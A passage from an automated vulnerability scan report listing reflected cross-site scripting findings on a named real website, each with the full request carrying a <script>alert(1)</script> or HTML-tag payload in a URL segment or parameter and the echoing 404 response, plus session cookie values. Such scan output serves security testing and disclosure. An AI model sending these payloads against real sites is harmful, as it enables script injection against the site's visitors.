HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/search.php5eb40<script>alert(1)</script>edf7bbccfce?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1977. http://www.resellerbase.com/detail/28/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/28/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 2be3f<a>a7cd578821 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/28/search.php?keyword=search...&Submit3=Search2be3f<a>a7cd578821&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/search.php?keyword=search...&Submit3=Search2be3f<a>a7cd578821&opt=2 was not found on this server.</p>
...[SNIP]...

2.1978. http://www.resellerbase.com/detail/28/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/28/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2c1e9<a>e7f0f86017b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/28/search.php?keyword=search...2c1e9<a>e7f0f86017b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/search.php?keyword=search...2c1e9<a>e7f0f86017b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1979. http://www.resellerbase.com/detail/28/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7bd2c<script>alert(1)</script>c7582e2fde7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/search.php?keyword=search...&Submit3=Search&opt=2&7bd2c<script>alert(1)</script>c7582e2fde7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/search.php?keyword=search...&Submit3=Search&opt=2&7bd2c<script>alert(1)</script>c7582e2fde7=1 was not found on this server.</p>
...[SNIP]...

2.1980. http://www.resellerbase.com/detail/28/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/28/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9fa63<a>8f1273b0566 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/28/search.php?keyword=search...&Submit3=Search&opt=29fa63<a>8f1273b0566 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/search.php?keyword=search...&Submit3=Search&opt=29fa63<a>8f1273b0566 was not found on this server.</p>
...[SNIP]...

2.1981. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a7361<script>alert(1)</script>8b8b70c7bd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila7361<script>alert(1)</script>8b8b70c7bd5/28/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila7361<script>alert(1)</script>8b8b70c7bd5/28/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1982. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dd38<script>alert(1)</script>4bc3fcd766b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/281dd38<script>alert(1)</script>4bc3fcd766b/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/281dd38<script>alert(1)</script>4bc3fcd766b/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1983. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44624<script>alert(1)</script>5c0c958b049 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes44624<script>alert(1)</script>5c0c958b049/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes44624<script>alert(1)</script>5c0c958b049/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1984. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 13241<script>alert(1)</script>1e0193c870b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes/kosmos13241<script>alert(1)</script>1e0193c870b/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes/kosmos13241<script>alert(1)</script>1e0193c870b/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1985. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 60d03<script>alert(1)</script>7be0bdbd5ac was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes/kosmos/images60d03<script>alert(1)</script>7be0bdbd5ac/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes/kosmos/images60d03<script>alert(1)</script>7be0bdbd5ac/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1986. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 99a7b<script>alert(1)</script>e09fa916933 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes/kosmos/images/rating99a7b<script>alert(1)</script>e09fa916933/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes/kosmos/images/rating99a7b<script>alert(1)</script>e09fa916933/0.gif was not found on this server.</p>
...[SNIP]...

2.1987. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload cc638<script>alert(1)</script>fedc97d3b4f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes/kosmos/images/rating/0.gifcc638<script>alert(1)</script>fedc97d3b4f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes/kosmos/images/rating/0.gifcc638<script>alert(1)</script>fedc97d3b4f was not found on this server.</p>
...[SNIP]...

2.1988. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc043<script>alert(1)</script>c85c125a91a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes/kosmos/images/rating/0.gif?fc043<script>alert(1)</script>c85c125a91a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes/kosmos/images/rating/0.gif?fc043<script>alert(1)</script>c85c125a91a=1 was not found on this server.</p>
...[SNIP]...

2.1989. http://www.resellerbase.com/detail/29/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20017<script>alert(1)</script>b9dead9f974 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail20017<script>alert(1)</script>b9dead9f974/29/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

2.1990. http://www.resellerbase.com/detail/29/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 949e5<script>alert(1)</script>e1fb464725b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29949e5<script>alert(1)</script>e1fb464725b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29949e5<script>alert(1)</script>e1fb464725b/ was not found on this server.</p>
...[SNIP]...

2.1991. http://www.resellerbase.com/detail/29/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 494bf<script>alert(1)</script>5d919682e07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/?494bf<script>alert(1)</script>5d919682e07=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/?494bf<script>alert(1)</script>5d919682e07=1 was not found on this server.</p>
...[SNIP]...

2.1992. http://www.resellerbase.com/detail/29/mediaplazza-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/mediaplazza-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3b2d<script>alert(1)</script>702a4ea7f20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila3b2d<script>alert(1)</script>702a4ea7f20/29/mediaplazza-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila3b2d<script>alert(1)</script>702a4ea7f20/29/mediaplazza-com.html was not found on this server.</p>
...[SNIP]...

2.1993. http://www.resellerbase.com/detail/29/mediaplazza-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/mediaplazza-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 159e3<a>31c3c71cc55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29159e3<a>31c3c71cc55/mediaplazza-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29159e3<a>31c3c71cc55/mediaplazza-com.html was not found on this server.</p>
...[SNIP]...

2.1994. http://www.resellerbase.com/detail/29/mediaplazza-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/mediaplazza-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2657b<script>alert(1)</script>43ab51f2c45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/2657b<script>alert(1)</script>43ab51f2c45 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/2657b<script>alert(1)</script>43ab51f2c45 was not found on this server.</p>
...[SNIP]...

2.1995. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db81c<script>alert(1)</script>bf3b8c2fd81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildb81c<script>alert(1)</script>bf3b8c2fd81/29/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildb81c<script>alert(1)</script>bf3b8c2fd81/29/rating.php was not found on this server.</p>
...[SNIP]...

2.1996. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1371<script>alert(1)</script>d1cb6ee4e1eb27149 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

